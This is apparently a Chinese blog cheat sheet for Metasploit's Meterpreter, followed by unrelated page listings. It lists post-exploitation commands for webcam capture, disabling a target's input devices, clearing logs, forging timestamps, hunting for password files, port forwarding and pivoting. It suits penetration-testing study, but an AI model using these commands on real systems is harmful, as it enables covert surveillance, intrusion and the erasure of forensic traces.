再探 Metasploit 持续更新中

一 . 配置环境

系统: kali-linux  1.0     教程:https://www.jianshu.com/p/27ca274b70c8

版本: Framework        Console

二 .  基础知识

三 .  引自 Meterpreter

0 × 01  系统命令

1)基本系统命令

       session      -i   <ID值>     #进入会话    -k     干掉会话

       background    # 将当前会话放置后台

       run    # 执行已有的模块

       info    # 查看已有模块

       getuid    # 查看权限

       getpid    # 获取当前进程的 pid

       sysinfo    # 查看目标机系统信息

       ps    # 查看当前活跃进程

       idletime    # 查看目标机闲置时间

       reboot / shutdown   # 重启 / 关机

       shell    # 进入目标机

2)uictl 开关键盘/鼠标

      uictl [enable/disable] [keyboard/mouse/all] #开启或禁止键盘/鼠标

      uictl disable mouse #禁用鼠标        uictl disable keyboard #禁用键盘

3)网络摄像头命令

       webcam_list    # 查看摄像头

       webcam_snap    # 通过摄像头拍照

       webcam_stream     # 通过摄像头开启视频

4)执行可执行文件

       execute   # 在目标机中执行文件

       execute  -H  -i  -f  cmd.exe   # 创建新进程 cmd.exe -H不可见 -i交互  -f  程序

5)迁移进程

       getpid    #获取当前进程的pid

       ps        #查看当前活跃进程

       migrate  <pid值>    #将Metepreter会话移植到制定的pid值的进程中

6) clearev 清除日志

0 x 02   文件系统命令

1)基于文件系统命令

       getwd 或者 pwd    # 查看当前目标机工作目录

       getlwd    # 查看当前本机的工作目录

       ls    # 列出当前目录中的文件

       cd    # 进入目标机指定目录

       lcd    # 进入本机指定目录

       search   -f   *pass*    # 搜索文件

       cat   # 查看指定文件的内容

       upload  # 上传文件到目标机

       download    # 下载文件到本机

       edit    # 编辑或创建文件<创建文件有待在更新版本的msf上测试>

       rm    # 删除文件

       mkdir / rmdir    # 只能在当前目录下创建/删除文件夹

2) timestomp 伪造时间戳

       timestomp   -v   C://2.txt   # 查看时间戳

       timestomp   C://2.txt   -f   C://1.txt     # 将1.txt 的时间戳给 2.txt  

0 × 03 网络命令

1)基本网络命令

       ifconfig / ifconfig

       netstat  -ano

       arp

       getproxy   # 查看代理信息

       route    

2)portfwd端口转发

       portfwd    add   -l   6666  -p  3389   -r   127.0.0.1    #将目标机的3389端口转发到本地的6666

3) 自动添加路由

       run   autoroute   -s   192.168.159.0/24   # 添加到目标环境网关的路由表

        run   autoroute   -p    #查看添加的路由  

4)  SOCKS4A代理

       msf> use  auxiliary / server / socks4a

       msf>  set   srvhost   127.0.0.1

       msf>  set   srvport    1080

       msf>  run

0 × 04  信息收集   <功能强大,会合你胃口>

       插件位置如下

       post/winodws/gather

       post/linux/gather

0 × 05   提权

1)getsystem提权

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 159,716评论 4 364
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,558评论 1 294
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 109,431评论 0 244
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 44,127评论 0 209
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,511评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,692评论 1 222
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,915评论 2 313
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,664评论 0 202
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,412评论 1 246
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,616评论 2 245
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,105评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,424评论 2 254
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,098评论 3 238
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,096评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,869评论 0 197
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,748评论 2 276
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,641评论 2 271

推荐阅读更多精彩内容

  • 运行操作 CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) CM...
    小明yz阅读 2,627评论 0 8
  • 命令简介 cmd是command的缩写.即命令行 。 虽然随着计算机产业的发展,Windows 操作系统的应用越来...
    ___大鱼___阅读 968评论 1 5
  • .bat脚本基本命令语法 目录 批处理的常见命令(未列举的命令还比较多,请查阅帮助信息) 1、REM 和 :: 2...
    庆庆庆庆庆阅读 7,938评论 1 19
  • 个人学习批处理的初衷来源于实际工作;在某个迭代版本有个BS(安卓手游模拟器)大需求,从而在测试过程中就重复涉及到...
    Luckykailiu阅读 4,533评论 0 11
  • 官网 中文版本 好的网站 Content-type: text/htmlBASH Section: User ...
    不排版阅读 4,313评论 0 5